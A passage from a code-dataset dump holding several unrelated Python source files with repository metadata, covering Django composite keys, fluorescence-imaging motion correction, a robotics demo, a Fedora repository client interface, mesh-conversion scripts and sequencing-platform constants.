hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49c08ac397715e801d537d9aef1fa2cc32d852d3
| 3,915
|
py
|
Python
|
composite.py
|
ubuviz/vizion-composite-key
|
c8b549bb158fe64013d3db2074e3330a942509ab
|
[
"MIT"
] | null | null | null |
composite.py
|
ubuviz/vizion-composite-key
|
c8b549bb158fe64013d3db2074e3330a942509ab
|
[
"MIT"
] | null | null | null |
composite.py
|
ubuviz/vizion-composite-key
|
c8b549bb158fe64013d3db2074e3330a942509ab
|
[
"MIT"
] | 1
|
2021-06-27T15:49:18.000Z
|
2021-06-27T15:49:18.000Z
|
"""
This module provides a ``CompositePKModel`` which allows for basic retrieval
and saving of models with composite keys.
It is limited to the above tasks, and any use of the model past this is not
guaranteed to work.
A model with composite PK should look something like this::
from composite_pk import composite
class Lot(composite.CompositePKModel):
auction = models.ForeignKey(Auction, primary_key=True)
lot_number = models.IntegerField(primary_key=True)
objects = composite.CompositePKManager()
So it must:
* subclass the ``CompositePKModel``,
* have two or more fields which set the ``primary_key`` attribute to True,
and
* use the ``CompositePKManager`` as the initial manager.
"""
__version__ = "1.0.1"
__author__ = "Ubuviz"
from django.db import models
from django.db.models.base import ModelBase
class CompositePKModelBase(ModelBase):
def __new__(cls, name, bases, attrs, **kwargs):
cls = super(CompositePKModelBase, cls).__new__(cls, name, bases, attrs, **kwargs)
if hasattr(cls, '_meta'):
if hasattr(cls, '_primary_keys'):
cls._primary_keys = cls._primary_keys[:]
else:
cls._primary_keys = []
for field in cls._meta.fields:
if not field.primary_key:
continue
field.primary_key = False
cls._primary_keys.append(field.name)
# While setting the meta PK to none seems like a good idea, it is
# necessary in a lot of places, hence why the following line is
# commented.
#cls._meta.pk = None
return cls
class CompositePKModel(models.Model, metaclass=CompositePKModelBase):
class Meta:
abstract = True
def _get_pk_val(self, *args, **kwargs):
if self._primary_keys:
pk = {}
for field_name in self._primary_keys:
attr = self._meta.get_field(field_name).attname
pk[field_name] = getattr(self, attr)
return pk
return super(CompositePKModel, self)._get_pk_val(*args, **kwargs)
def _set_pk_val(self, *args, **kwargs):
return super(CompositePKModel, self)._set_pk_val(*args, **kwargs)
pk = property(_get_pk_val, _set_pk_val)
class CompositePKQuerySet(models.query.QuerySet):
def _expand_pk(self, kwargs):
"""
Expand a composite primary key into the fields it represents into a
kwargs dictionary.
The dictionary is modified inline rather than a modified copy returned.
"""
for key, value in kwargs.items():
if '__' in key:
field, remainder = key.split('__', 1)
else:
field, remainder = key, ''
if field != 'pk':
continue
if isinstance(value, dict):
del kwargs['pk']
for pk_field in self.model._primary_keys:
kwargs['%s%s' % (pk_field, remainder)] = value[pk_field]
def filter(self, *args, **kwargs):
"""
Returns a new QuerySet instance with the args ANDed to the existing
set.
"""
self._expand_pk(kwargs)
return self._filter_or_exclude(False, *args, **kwargs)
def exclude(self, *args, **kwargs):
"""
Returns a new QuerySet instance with NOT (args) ANDed to the existing
set.
"""
self._expand_pk(kwargs)
return self._filter_or_exclude(True, *args, **kwargs)
class CompositePKManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
"""Returns a new QuerySet object. Subclasses can override this method
to easily customize the behavior of the Manager.
"""
return CompositePKQuerySet(self.model, using=self._db)
| 32.090164
| 89
| 0.614049
| 3,019
| 0.771137
| 0
| 0
| 0
| 0
| 0
| 0
| 1,533
| 0.391571
|
49c27444ea8191b6871d22350e36ce9770315509
| 752
|
py
|
Python
|
qurry/libraries/standard_library/constructs/gaussian.py
|
LSaldyt/curry
|
9004a396ec2e351aa143a10a53156649a6747343
|
[
"MIT"
] | 11
|
2018-07-28T17:08:23.000Z
|
2019-02-08T03:04:03.000Z
|
qurry/libraries/standard_library/constructs/gaussian.py
|
LSaldyt/Qurry
|
9004a396ec2e351aa143a10a53156649a6747343
|
[
"MIT"
] | 33
|
2019-07-09T09:46:44.000Z
|
2019-09-23T23:44:37.000Z
|
qurry/libraries/standard_library/constructs/gaussian.py
|
LSaldyt/Qurry
|
9004a396ec2e351aa143a10a53156649a6747343
|
[
"MIT"
] | 4
|
2019-05-28T01:27:49.000Z
|
2019-12-26T18:01:51.000Z
|
from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian_cdf(x, mu, sigma):
y = (1.0 + erf((x - mu) / (sigma * sqrt(2.0)))) / 2.0
y = (1.0 + erf((x) / (sqrt(2.0)))) / 2.0
assert y >= 0 and y <= 1.0, 'y is not a valid probability: y={}'.format(y)
return y
def gaussian_cdfp(mu, sigma):
return partial(gaussian_cdf, mu=mu, sigma=sigma)
def gaussian(mu, sigma, block, kernel=None):
'''
Construct to create a discrete approximation of the gaussian distribution using mu and sigma
(gaussian 0 1 blocka)
'''
return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
| 34.181818
| 133
| 0.668883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.226064
|
49c3520395affa81361da9069657257acb15bac3
| 8,299
|
py
|
Python
|
tmac/models.py
|
Nondairy-Creamer/tmac
|
d688b58f13f398f83ea0bdad139e69b74398c1be
|
[
"MIT"
] | null | null | null |
tmac/models.py
|
Nondairy-Creamer/tmac
|
d688b58f13f398f83ea0bdad139e69b74398c1be
|
[
"MIT"
] | null | null | null |
tmac/models.py
|
Nondairy-Creamer/tmac
|
d688b58f13f398f83ea0bdad139e69b74398c1be
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import time
from scipy import optimize
from scipy.stats import norm
import tmac.probability_distributions as tpd
import tmac.fourier as tfo
def tmac_ac(red_np, green_np, optimizer='BFGS', verbose=False, truncate_freq=False):
""" Implementation of the Two-channel motion artifact correction method (TMAC)
This is tmac_ac because it is the additive and circular boundary version
This code takes in imaging fluoresence data from two simultaneously recorded channels and attempts to remove
shared motion artifacts between the two channels
Args:
red_np: numpy array, [time, neurons], activity independent channel
green_np: numpy array, [time, neurons], activity dependent channel
optimizer: string, scipy optimizer
verbose: boolean, if true, outputs when inference is complete on each neuron and estimates time to finish
truncate_freq: boolean, if true truncates low amplitude frequencies in Fourier domain. This should give the same
results but may give sensitivity to the initial conditions
Returns: a dictionary containing: all the inferred parameters of the model
"""
# optimization is performed using Scipy optimize, so all tensors should stay on the CPU
device = 'cpu'
dtype = torch.float64
red_nan = np.any(np.isnan(red_np))
red_inf = np.any(np.isinf(red_np))
green_nan = np.any(np.isnan(green_np))
green_inf = np.any(np.isinf(green_np))
if red_nan or red_inf or green_nan or green_inf:
raise Exception('Input data cannot have any nan or inf')
# convert data to units of fold mean and subtract mean
red_np = red_np / np.mean(red_np, axis=0) - 1
green_np = green_np / np.mean(green_np, axis=0) - 1
# convert to tensors and fourier transform
red = torch.tensor(red_np, device=device, dtype=dtype)
green = torch.tensor(green_np, device=device, dtype=dtype)
red_fft = tfo.real_fft(red)
green_fft = tfo.real_fft(green)
# estimate all model parameters from the data
variance_r_noise_init = np.var(red_np, axis=0)
variance_g_noise_init = np.var(green_np, axis=0)
variance_a_init = np.var(green_np, axis=0)
variance_m_init = np.var(red_np, axis=0)
# initialize length scale using the autocorrelation of the data
length_scale_a_init = np.zeros(red_np.shape[1])
length_scale_m_init = np.zeros(red_np.shape[1])
for n in range(green_np.shape[1]):
# approximate as the standard deviation of a gaussian fit to the autocorrelation function
length_scale_m_init[n] = initialize_length_scale(red_np[:, n])
length_scale_a_init[n] = initialize_length_scale(green_np[:, n])
# preallocate space for all the training variables
a_trained = np.zeros(red_np.shape)
m_trained = np.zeros(red_np.shape)
variance_r_noise_trained = np.zeros(variance_r_noise_init.shape)
variance_g_noise_trained = np.zeros(variance_g_noise_init.shape)
variance_a_trained = np.zeros(variance_a_init.shape)
length_scale_a_trained = np.zeros(length_scale_a_init.shape)
variance_m_trained = np.zeros(variance_m_init.shape)
length_scale_m_trained = np.zeros(length_scale_m_init.shape)
# loop through each neuron and perform inference
start = time.time()
for n in range(red_np.shape[1]):
# get the initial values for the hyperparameters of this neuron
# All hyperparameters are positive so we fit them in log space
evidence_training_variables = np.log([variance_r_noise_init[n], variance_g_noise_init[n], variance_a_init[n],
length_scale_a_init[n], variance_m_init[n], length_scale_m_init[n]])
# define the evidence loss function. This function takes in and returns pytorch tensors
def evidence_loss_fn(training_variables):
return -tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], training_variables[0],
green[:, n], green_fft[:, n], training_variables[1],
training_variables[2], training_variables[3],
training_variables[4], training_variables[5],
truncate_freq=truncate_freq)
# a wrapper function of evidence that takes in and returns numpy variables
def evidence_loss_fn_np(training_variables_in):
training_variables = torch.tensor(training_variables_in, dtype=dtype, device=device)
return evidence_loss_fn(training_variables).numpy()
# wrapper function of for Jacobian of the evidence that takes in and returns numpy variables
def evidence_loss_jacobian_np(training_variables_in):
training_variables = torch.tensor(training_variables_in, dtype=dtype, device=device, requires_grad=True)
loss = evidence_loss_fn(training_variables)
return torch.autograd.grad(loss, training_variables, create_graph=False)[0].numpy()
# optimization function with Jacobian from pytorch
trained_variances = optimize.minimize(evidence_loss_fn_np, evidence_training_variables,
jac=evidence_loss_jacobian_np,
method=optimizer)
# calculate the posterior values
# The posterior is gaussian so we don't need to optimize, we find a and m in one step
trained_variance_torch = torch.tensor(trained_variances.x, dtype=dtype, device=device)
a, m = tpd.tmac_evidence_and_posterior(red[:, n], red_fft[:, n], trained_variance_torch[0], green[:, n], green_fft[:, n], trained_variance_torch[1],
trained_variance_torch[2], trained_variance_torch[3], trained_variance_torch[4], trained_variance_torch[5],
calculate_posterior=True, truncate_freq=truncate_freq)
a_trained[:, n] = a.numpy()
m_trained[:, n] = m.numpy()
variance_r_noise_trained[n] = torch.exp(trained_variance_torch[0]).numpy()
variance_g_noise_trained[n] = torch.exp(trained_variance_torch[1]).numpy()
variance_a_trained[n] = torch.exp(trained_variance_torch[2]).numpy()
length_scale_a_trained[n] = torch.exp(trained_variance_torch[3]).numpy()
variance_m_trained[n] = torch.exp(trained_variance_torch[4]).numpy()
length_scale_m_trained[n] = torch.exp(trained_variance_torch[5]).numpy()
if verbose:
decimals = 1e3
# print out timing
elapsed = time.time() - start
remaining = elapsed / (n + 1) * (red_np.shape[1] - (n + 1))
elapsed_truncated = np.round(elapsed * decimals) / decimals
remaining_truncated = np.round(remaining * decimals) / decimals
print(str(n + 1) + '/' + str(red_np.shape[1]) + ' neurons complete')
print(str(elapsed_truncated) + 's elapsed, estimated ' + str(remaining_truncated) + 's remaining')
trained_variables = {'a': a_trained,
'm': m_trained,
'variance_r_noise': variance_r_noise_trained,
'variance_g_noise': variance_g_noise_trained,
'variance_a': variance_a_trained,
'length_scale_a': length_scale_a_trained,
'variance_m': variance_m_trained,
'length_scale_m': length_scale_m_trained,
}
return trained_variables
def initialize_length_scale(y):
""" Function to fit a Gaussian to the autocorrelation of y
Args:
y: numpy vector
Returns: Standard deviation of a Gaussian fit to the autocorrelation of y
"""
x = np.arange(-len(y)/2, len(y)/2) + 0.5
y_z_score = (y - np.mean(y)) / np.std(y)
y_corr = np.correlate(y_z_score, y_z_score, mode='same')
# fit the std of a gaussian to the correlation function
def loss(p):
return p[0] * norm.pdf(x, 0, p[1]) - y_corr
p_init = np.array((np.max(y_corr), 1.0))
p_hat = optimize.leastsq(loss, p_init)[0]
# return the standard deviation
return p_hat[1]
| 49.106509
| 156
| 0.662128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,439
| 0.293891
|
49c41f791b3306b65a7220115c0864d09f5d6134
| 2,166
|
py
|
Python
|
demo.py
|
TianhongDai/esil-hindsight
|
b7c22da087095610018f281245fd4f622ef190ed
|
[
"MIT"
] | 5
|
2020-10-14T14:10:27.000Z
|
2020-11-23T12:46:08.000Z
|
demo.py
|
TianhongDai/esil-hindsight
|
b7c22da087095610018f281245fd4f622ef190ed
|
[
"MIT"
] | 5
|
2020-10-14T18:57:37.000Z
|
2021-10-21T11:10:12.000Z
|
demo.py
|
TianhongDai/esil-hindsight
|
b7c22da087095610018f281245fd4f622ef190ed
|
[
"MIT"
] | 1
|
2021-12-01T08:55:28.000Z
|
2021-12-01T08:55:28.000Z
|
from arguments import get_args
import numpy as np
from network.models import MLP_Net
from utils.utils import get_env_params
import torch
import os, gym
"""
script to watch the demo of the ESIL
"""
# process the inputs
def process_inputs(o, g, o_mean, o_std, g_mean, g_std, args):
o_clip = np.clip(o, -args.clip_obs, args.clip_obs)
g_clip = np.clip(g, -args.clip_obs, args.clip_obs)
o_norm = np.clip((o_clip - o_mean) / (o_std), -args.clip_range, args.clip_range)
g_norm = np.clip((g_clip - g_mean) / (g_std), -args.clip_range, args.clip_range)
inputs = np.concatenate([o_norm, g_norm])
inputs = torch.tensor(inputs, dtype=torch.float32).unsqueeze(0)
return inputs
if __name__ == '__main__':
args = get_args()
# create environment
env = gym.make(args.env_name)
# get the environment parameters
env_params = get_env_params(env)
# start to create model
model_path = '{}/{}/model.pt'.format(args.save_dir, args.env_name)
network = MLP_Net(env_params['obs'] + env_params['goal'], env_params['action'], args.dist)
network_model, obs_mean, obs_std, g_mean, g_std = torch.load(model_path, map_location='cpu')
network.load_state_dict(network_model)
network.eval()
# start to do the testing
for i in range(args.demo_length):
observation = env.reset()
# start to do the demo
obs, g = observation['observation'], observation['desired_goal']
for t in range(env._max_episode_steps):
if args.render:
env.render()
inputs = process_inputs(obs, g, obs_mean, obs_std, g_mean, g_std, args)
with torch.no_grad():
_, pi = network(inputs)
if args.dist == 'gauss':
mean, std = pi
input_actions = mean.detach().cpu().numpy().squeeze()
else:
raise NotImplementedError
# put actions into the environment
observation_new, reward, _, info = env.step(input_actions)
obs = observation_new['observation']
print('the episode is: {}, is success: {}'.format(i, info['is_success']))
| 40.111111
| 96
| 0.636657
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 365
| 0.168513
|
49c45451bcf8f4588b0bba3456a64c9403ea4bc6
| 1,071
|
py
|
Python
|
kickbase_api/models/league_user_stats.py
|
jhelgert/kickbase-api-python
|
6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2
|
[
"MIT"
] | 7
|
2020-08-17T07:20:30.000Z
|
2022-02-03T19:21:53.000Z
|
kickbase_api/models/league_user_stats.py
|
jhelgert/kickbase-api-python
|
6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2
|
[
"MIT"
] | 4
|
2020-11-01T10:39:11.000Z
|
2021-07-30T12:20:52.000Z
|
kickbase_api/models/league_user_stats.py
|
jhelgert/kickbase-api-python
|
6e8b12c69cf36a4ce5c3ac37f9328cde5946a3e2
|
[
"MIT"
] | 4
|
2020-11-01T09:12:39.000Z
|
2021-08-23T13:25:00.000Z
|
from datetime import datetime
from kickbase_api.models._transforms import parse_date, parse_key_value_array_to_dict
from kickbase_api.models.base_model import BaseModel
from kickbase_api.models.league_user_season_stats import LeagueUserSeasonStats
class LeagueUserStats(BaseModel):
name: str = None
profile_image_path: str = None
cover_image_path: str = None
flags: int = None
placement: int = None
points: int = None
team_value: float = None
seasons: [LeagueUserSeasonStats] = None
team_values: {datetime: float}
def __init__(self, d: dict = {}):
self._json_transform = {
"teamValues": parse_key_value_array_to_dict(lambda o: parse_date(o["d"]), lambda o: o["v"]),
"seasons": lambda v: [LeagueUserSeasonStats(_d) for _d in v]
}
self._json_mapping = {
"profileUrl": "profile_image_path",
"coverUrl": "cover_image_path",
"teamValue": "team_value",
"teamValues": "team_values"
}
super().__init__(d)
| 32.454545
| 104
| 0.655462
| 819
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 135
| 0.12605
|
49c52e67e91490b5205014ce1748575c1b06124d
| 9,647
|
py
|
Python
|
ocradmin/lib/fcrepo/http/interfaces.py
|
mikesname/ocropodium
|
a3e379cca38dc1999349bf4e9b5608e81dc54b10
|
[
"Apache-2.0"
] | 2
|
2015-03-30T16:36:51.000Z
|
2016-06-15T01:39:47.000Z
|
ocradmin/lib/fcrepo/http/interfaces.py
|
mikesname/ocropodium
|
a3e379cca38dc1999349bf4e9b5608e81dc54b10
|
[
"Apache-2.0"
] | 2
|
2021-06-10T17:43:54.000Z
|
2021-12-13T19:40:08.000Z
|
ocradmin/lib/fcrepo/http/interfaces.py
|
mikesname/ocropodium
|
a3e379cca38dc1999349bf4e9b5608e81dc54b10
|
[
"Apache-2.0"
] | 1
|
2015-11-08T00:40:11.000Z
|
2015-11-08T00:40:11.000Z
|
""" Interfaces for FCRepoRequestFactory, FCRepoResponse and FCRepoResponseBody.
"""
from exceptions import NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoResponseBody:
def __init__(self, raw_content, mime_type):
""" Constructor takes tow arguments :
raw_content = raw body content (Base64 encoded).
mime_type = MimeTyoe of the body content.
"""
raise NotImplementedError
def getContent(self):
""" Returns the reponse body properly formatted for the MimeType.
"""
raise NotImplementedError
def getMimeType(self):
""" Returns the MimeType of the body content.
"""
raise NotImplementedError
def getRawData(self):
""" Returns the raw response body (Base64 encoded).
"""
raise NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoResponse:
def __init__(self):
# init method args are implementation-dependent
pass
def getBody(self):
""" Provides accces to body content enclosed in the response
"""
raise NotImplementedError
def getFooter(self, name, default):
""" Returns value of a response footer parameter. Takes two arguments:
name = name of the parameter
default = default value to be returned when parameter is NOT
in the footer.
"""
raise NotImplementedError
def getFooters(self):
""" Returns all response footer parameters as a Python dictionary.
"""
raise NotImplementedError
def getHeader(self, name, default):
""" Returns value of a response header parameter. Takes two arguments:
name = name of the parameter
default = default value to be returned when parameter is NOT
in the header.
"""
raise NotImplementedError
def getHeaders(self):
""" Returns all response header parameters as a Python dictionary.
"""
raise NotImplementedError
def getStatus(self):
""" Returns the HTTP status code returned for the request.
"""
raise NotImplementedError
def getRequestMethod(self):
""" Returns the name of the HTTP method used for the request.
"""
raise NotImplementedError
def getRequestURI(self):
""" Returns the complete escaped URI used for the request.
"""
raise NotImplementedError
def getRequest(self):
""" Returns the reguest method and the complete escaped request
URI as a single string.
"""
raise NotImplementedError
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
class I_FCRepoRequestFactory:
def __init__(self, repository_url, username, password, realm='any'):
""" Requires at least four arguments:
repository_url = the base URL for the Fedora Repository
including the protocol, domain, port,
and context.
username = name of a user that is authorized to perform
requests using the Fedora REST API.
password = password for the authorized user.
realm = authorization realm, must ak=llow the string 'any' to
designate that authentication is valid for anty realm.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def DELETE(self, request_uri):
""" Submits a DELETE request for the requested URI.
Takes a single argument:
request_uri = the query portion of the DELETE request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
Returns results of the request as a FCRepoResponse object.
"""
raise NotImplementedError
def GET(self, request_uri):
""" Submits a GET request for the requested URI
Takes a single argument:
request_uri = the query portion of the DELETE request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
"""
raise NotImplementedError
def POST(self, request_uri, content=None, chunked=False):
""" Submits a POST request for the requested URI
Takes a three arguments:
request_uri = the query portion of the DELETE request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
content = contet to be include in POST request (if any)
chunked = boolean indiciating whether contant is to be provided
in chunks.
"""
raise NotImplementedError
def PUT(self, request_uri, content=None, chunked=False):
""" Submits a PUT request for the requested URI
Takes a three arguments:
request_uri = the query portion of the DELETE request
i.e. the URL for the request without the protocol,
domain, port and context of the Fedora Repository.
content = contet to be include in POST request (if any)
chunked = boolean indiciating whether contant is to be provided
in chunks.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def getAuthPassword(self):
""" Returns current value of password to be used for authenticating
access to the Fedora Repository (as set in the constructor or by
the setAuthPassword method).
"""
raise NotImplementedError
def getAuthRealm(self):
""" Returns current value of realm to be used for authenticating
access to the Fedora Repository (as set in the constructor or by
the setAuthRealm method).
"""
raise NotImplementedError
def getAuthUser(self):
""" Returns current value of the username to be used for
authenticating access to the Fedora Repository (as set in the
constructor or by the setAuthUser method).
"""
raise NotImplementedError
def getContext(self):
""" Returns current value of the context to be used for accesssing
the Fedora Repository (as initialized by the constructor or
set by the setContext method).
"""
raise NotImplementedError
def getDomain(self):
""" Returns current value of the internat domain to be used for
accesssing the Fedora Repository (as initialized by the constructor
or set by the setDomain method).
"""
raise NotImplementedError
def getPort(self):
""" Returns current value of the port to be used for accesssing
the Fedora Repository (as initialized by the constructor or set
by the setPort method).
"""
raise NotImplementedError
def getProtocol(self):
""" Returns current value of the HTTP protocol to be used for
accesssing the Fedora Repository (as initialized by the constructor
or set by the setProtocol method).
"""
raise NotImplementedError
def getRepositoryURL(self):
""" Returns current value of the root URL to be used for accesssing
the Fedora Repository. It is constructed from the current values
of the HTTP protocol, repository domain name, port number and
repository context.
"""
raise NotImplementedError
def getLastRequest(self):
""" Returns a string representing the last HTTP Request that was
submitted by the factory. It will include the HTTP method and the
URL submitted. PUT and POST request strings will NOT include the
content submitted with the request.
"""
raise NotImplementedError
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def setAuthPassword(self, password):
""" Changes the value of the password to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setAuthRealm(self, realm):
""" Changes the value of the realm to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setAuthUser(self, username):
""" Changes the name of the user to be used for authenticating
access to the Fedora Repository.
"""
raise NotImplementedError
def setContext(self, context):
""" Changes the value of the context to be used for accessing
the Fedora Repository.
"""
raise NotImplementedError
def setDomain(self, url):
""" Changes the value of the domain to be used for accesssing
the Fedora Repository.
"""
raise NotImplementedError
def setPort(self, port):
""" Changes the value of the port used to be used for accesssing
the Fedora Repository.
"""
raise NotImplementedError
def setProtocol(self, protocol):
""" Changes the value of the HTTP protocol to be used for accesssing
the Fedora Repository.
"""
raise NotImplementedError
| 35.996269
| 79
| 0.59604
| 9,269
| 0.960817
| 0
| 0
| 0
| 0
| 0
| 0
| 6,801
| 0.704986
|
49c547bb09c7eed025dfa278cd31af58e1182d17
| 4,397
|
py
|
Python
|
mesh_utilities.py
|
qingfengxia/quasi_static_metal_cutting
|
9773fc0ea33c290057cb2230365094058216caf0
|
[
"AFL-1.1"
] | 2
|
2019-07-18T18:35:31.000Z
|
2021-09-12T14:00:58.000Z
|
mesh_utilities.py
|
qingfengxia/quasi_static_metal_cutting
|
9773fc0ea33c290057cb2230365094058216caf0
|
[
"AFL-1.1"
] | 1
|
2020-04-26T04:22:26.000Z
|
2020-05-11T08:54:44.000Z
|
mesh_utilities.py
|
qingfengxia/quasi_static_metal_cutting
|
9773fc0ea33c290057cb2230365094058216caf0
|
[
"AFL-1.1"
] | null | null | null |
#utf8
from __future__ import print_function, division
import subprocess
import os
import os.path
import sys
import time
default_tmp_mesh_filename = '/tmp/Mesh_1.med'
# salome 9.x may be too new for this script, some version released in 2018 is better
# salome_app = '/media/sf_OneDrive/Salome-9.8.0/salome'
salome_app = '/home/qingfeng/SALOME-9.7.0/salome'
gmsh_app = '/media/sf_OneDrive/gmsh-4.10.2-Linux64/bin/gmsh'
def run_command(comandlist):
has_error = False
try:
print(comandlist)
p = subprocess.Popen(comandlist, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
print(output) # stdout is still cut at some point but the warnings are in stderr and thus printed :-)
print(error) # stdout is still cut at some point but the warnings are in stderr and thus printed :-)
except:
print('Error executing: {}\n'.format(comandlist))
has_error = True
return has_error
def defined(x):
return x in locals() or x in globals()
def generate_salome_mesh(mesh_gen_script, smesh_file = default_tmp_mesh_filename):
# this function is quite specific to my pc setup
if not os.path.exists(salome_app):
print('Error: salome executable is not found in the specified path\n', salome_app)
sys.exit(-1)
salome_cmd = "{} -t -b {}".format(salome_app, mesh_gen_script)
os.system(salome_cmd) # run_command will bring up GUI, but os.system does not!
# there is salome shutdown command inside the script
#"%PYTHONBIN%" "%KERNEL_ROOT_DIR%\bin\salome\runSalome.py" -t -u myScript.py
#%PYTHONBIN% "%KERNEL_ROOT_DIR%\bin\salome\killSalome.py"
# salome_cmd = ["/opt/SALOME-8.5.0-UB16.04-SRC/salome", "-t", script]
# run_command(salome_cmd)
check_mtime(smesh_file)
def convert_salome_mesh_to_dolfin(output_dolfin_mesh, smesh_file = default_tmp_mesh_filename):
gmsh_filename = output_dolfin_mesh[:-4] + ".msh"
cmdline = "{} -format msh2 -o {} -save {}".format(gmsh_app, gmsh_filename, smesh_file)
run_command(cmdline) # check the return value 'has_error' does not always work so check the output timestamp
check_mtime(gmsh_filename)
run_command("dolfin-convert {} {}".format(gmsh_filename, output_dolfin_mesh))
check_mtime(output_dolfin_mesh)
def convert_salome_mesh_to_foam(output_foam_case_folder, smesh_file = default_tmp_mesh_filename):
gmsh_filename = smesh_file[:-4] + ".msh"
cmdline = "{} -format msh2 -o {} -save {}".format(gmsh_app, gmsh_filename, smesh_file)
run_command(cmdline)
check_mtime(gmsh_filename)
run_command("gmshToFoam -case {} {}".format(output_foam_case_folder, gmsh_filename))
check_mtime(output_foam_case_folder + '/constant/polyMesh/boundary')
def from_python_file_to_parameter_string(python_file):
#from StringIO import StringIO
#from io import stringIO
parameter_string = []
with open(python_file, "r") as inf:
lines = inf.readlines()
for i,l in enumerate(lines):
parameter_string.append(l.replace('#' , '//'))
return ''.join(parameter_string)
def generate_gmsh_mesh(mesh_file_root, mesh_parameter_string):
# if mesh_parameter_string is not provide, just use provided geo file
if mesh_parameter_string:
template_file = mesh_file_root + "_template.geo"
with open(template_file) as inf:
with open(mesh_file_root + ".geo", "w") as outf:
outf.write(mesh_parameter_string)
outf.write(inf.read())
# use gmsh4 instead gmsh3 here
gmshcmd = ['{} - -match -tol 1e-12 - {}.geo'.format(gmsh_app, mesh_file_root)]
if(run_command(gmshcmd)):
sys.exit()
check_mtime(mesh_file_root + ".msh")
def convert_salome_mesh_to_dolfin(mesh_file_root):
convertcmd= ['dolfin-convert {}.msh {}.xml'.format(mesh_file_root, mesh_file_root)]
if (run_command(convertcmd) ):
sys.exit()
check_mtime(mesh_file_root + ".xml")
def check_mtime(filename):
modified_time = os.path.getmtime(filename)
current_time = time.time() # in second since epoch
second_delta = current_time - modified_time
if second_delta > 200:
print('file `{}` modified time is more than {} seconds, mesh conversion failed?'.format(filename, second_delta))
print("file last modified at %s" % time.ctime(modified_time))
sys.exit()
| 43.97
| 120
| 0.705254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,527
| 0.347282
|
49c7ae5b76fbf1b02e8d130eadfb4143e44dcc80
| 8,141
|
py
|
Python
|
cubi_tk/ena_constants.py
|
eudesbarbosa/cubi-tk
|
80c3ef9387f2399f796b2cc445b99781d541f222
|
[
"MIT"
] | 3
|
2020-09-23T13:06:41.000Z
|
2022-01-14T10:14:20.000Z
|
cubi_tk/ena_constants.py
|
eudesbarbosa/cubi-tk
|
80c3ef9387f2399f796b2cc445b99781d541f222
|
[
"MIT"
] | 65
|
2020-09-23T13:22:41.000Z
|
2022-03-17T11:02:42.000Z
|
cubi_tk/ena_constants.py
|
eudesbarbosa/cubi-tk
|
80c3ef9387f2399f796b2cc445b99781d541f222
|
[
"MIT"
] | 4
|
2020-09-25T11:28:45.000Z
|
2021-11-01T12:00:13.000Z
|
"""Values for controlled vocabularies from ENA.
Taken from
- https://ena-docs.readthedocs.io/en/latest/submit/reads/webin-cli.html
"""
# Constants for platform definitions.
LS454 = "LS454"
ILLUMINA = "ILLUMINA"
PACBIO_SMRT = "PACBIO_SMRT"
IONTORRENT = "ION_TORRENT"
CAPILLARY = "CAPILLARY"
ONT = "OXFORD_NANOPORE"
BGISEQ = "BGISEQ"
DNBSEQ = "DNBSEQ"
#: Allowed platforms in ENA.
